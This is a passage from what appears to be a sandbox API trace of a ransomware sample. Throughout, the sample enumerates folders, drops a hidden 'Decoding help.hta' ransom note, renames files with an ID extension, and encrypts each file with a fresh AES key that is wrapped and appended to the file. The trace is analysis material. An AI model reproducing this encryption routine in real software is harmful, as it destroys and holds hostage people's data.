lpNumberOfBytesWritten=0xba4fcf8, lpOverlapped=0x0) Thread: id = 131 os_tid = 0x8cc [0040.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*", lpFindFileData=0x4b8fd30 | out: lpFindFileData=0x4b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a60b0 [0041.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.460] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x4b8fd30 | out: lpFindFileData=0x4b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.460] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.460] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.460] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x4b8fd30 | out: lpFindFileData=0x4b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x892529fc, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0x892529fc, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0x892529fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0041.460] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*" [0041.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*") returned 52 [0041.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\Decoding help.hta" [0041.460] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\services\\decoding help.hta")) returned 0xffffffff [0041.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\services\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0041.461] WriteFile (in: hFile=0x2f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4b8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4b8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.462] CloseHandle (hObject=0x2f0) returned 1 [0041.462] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.462] lstrcmpiW (lpString1="Decoding help.hta", lpString2="verisign.bmp") returned -1 [0041.462] lstrlenW (lpString="verisign.bmp") returned 12 [0041.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*" [0041.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*") returned 52 [0041.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\", lpString2="verisign.bmp" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" [0041.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" [0041.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp")) returned 1 [0041.691] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x4b8fd30 | out: lpFindFileData=0x4b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x892529fc, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0x892529fc, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0x892529fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0041.691] FindClose (in: hFindFile=0x5a60b0 | out: hFindFile=0x5a60b0) returned 1 Thread: id = 132 os_tid = 0x8c4 [0040.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xbb8fd30 | out: lpFindFileData=0xbb8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8210 [0041.781] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.781] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0xbb8fd30 | out: lpFindFileData=0xbb8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.781] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.781] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.781] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0xbb8fd30 | out: lpFindFileData=0xbb8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0041.781] lstrcpyW (in: lpString1=0x9a73010, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0041.782] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.782] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.782] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0041.782] WriteFile (in: hFile=0x480, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xbb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xbb8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.783] CloseHandle (hObject=0x480) returned 1 [0041.783] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.783] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OneNoteMUI.msi") returned -1 [0041.783] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0041.783] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0041.783] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.783] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="OneNoteMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" [0041.783] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" [0041.783] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.784] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0041.784] CreateFileMappingA (hFile=0x480, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x484 [0041.784] CryptAcquireContextA (in: phProv=0xbb8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xbb8fcec*=0x3449f08) returned 1 [0044.968] CryptGenKey (in: hProv=0x3449f08, Algid=0x6610, dwFlags=0x1, phKey=0xbb8fce8 | out: phKey=0xbb8fce8*=0x5d8190) returned 1 [0044.968] CryptExportKey (in: hKey=0x5d8190, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xbb8fbe4, pdwDataLen=0xbb8fce4 | out: pbData=0xbb8fbe4*, pdwDataLen=0xbb8fce4*=0x2c) returned 1 [0044.968] MapViewOfFile (hFileMappingObject=0x484, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x17a20000 [0044.985] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbb8fbe4*, pdwDataLen=0xbb8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xbb8fbe4*, pdwDataLen=0xbb8fcf8*=0x100) returned 1 [0044.986] CryptEncrypt (in: hKey=0x5d8190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x17a20000, pdwDataLen=0xbb8fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x17a20000*, pdwDataLen=0xbb8fce4*=0x100000) returned 1 [0045.741] UnmapViewOfFile (lpBaseAddress=0x17a20000) returned 1 [0045.946] CloseHandle (hObject=0x484) returned 1 [0045.946] CryptDestroyKey (hKey=0x5d8190) returned 1 [0045.946] CryptReleaseContext (hProv=0x3449f08, dwFlags=0x0) returned 1 [0045.946] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.946] WriteFile (in: hFile=0x480, lpBuffer=0xbb8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xbb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xbb8fbe4*, lpNumberOfBytesWritten=0xbb8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.020] WriteFile (in: hFile=0x480, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xbb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xbb8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.020] CloseHandle (hObject=0x480) returned 1 [0049.741] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.168] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0xbb8fd30 | out: lpFindFileData=0xbb8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0051.169] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0051.169] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0051.169] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0051.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0051.169] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OneNoteMUI.xml") returned -1 [0051.169] lstrlenW (lpString="OneNoteMUI.xml") returned 14 [0051.169] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0051.169] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0051.169] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="OneNoteMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0051.169] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0051.169] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0051.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.455] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b0 [0056.455] CreateFileMappingA (hFile=0x6b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0056.456] CryptAcquireContextA (in: phProv=0xbb8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xbb8fcec*=0x3448f18) returned 1 [0059.924] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0xbb8fce8 | out: phKey=0xbb8fce8*=0x5da4b8) returned 1 [0059.924] CryptExportKey (in: hKey=0x5da4b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xbb8fbe4, pdwDataLen=0xbb8fce4 | out: pbData=0xbb8fbe4*, pdwDataLen=0xbb8fce4*=0x2c) returned 1 [0059.924] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x2d0000 [0059.948] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbb8fbe4*, pdwDataLen=0xbb8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xbb8fbe4*, pdwDataLen=0xbb8fcf8*=0x100) returned 1 [0059.948] CryptEncrypt (in: hKey=0x5da4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xbb8fce4*=0x640, dwBufLen=0x640 | out: pbData=0x2d0000*, pdwDataLen=0xbb8fce4*=0x640) returned 1 [0059.948] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0059.950] CloseHandle (hObject=0x42c) returned 1 [0059.950] CryptDestroyKey (hKey=0x5da4b8) returned 1 [0059.950] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0059.950] SetFilePointerEx (in: hFile=0x6b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.951] WriteFile (in: hFile=0x6b0, lpBuffer=0xbb8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xbb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xbb8fbe4*, lpNumberOfBytesWritten=0xbb8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.357] WriteFile (in: hFile=0x6b0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xbb8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xbb8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.357] CloseHandle (hObject=0x6b0) returned 1 [0061.357] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.357] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0xbb8fd30 | out: lpFindFileData=0xbb8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0061.357] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0061.357] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0061.357] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0061.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0061.358] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OnoteLR.cab") returned -1 [0061.358] lstrlenW (lpString="OnoteLR.cab") returned 11 [0061.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0061.358] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0061.358] lstrcatW (in: 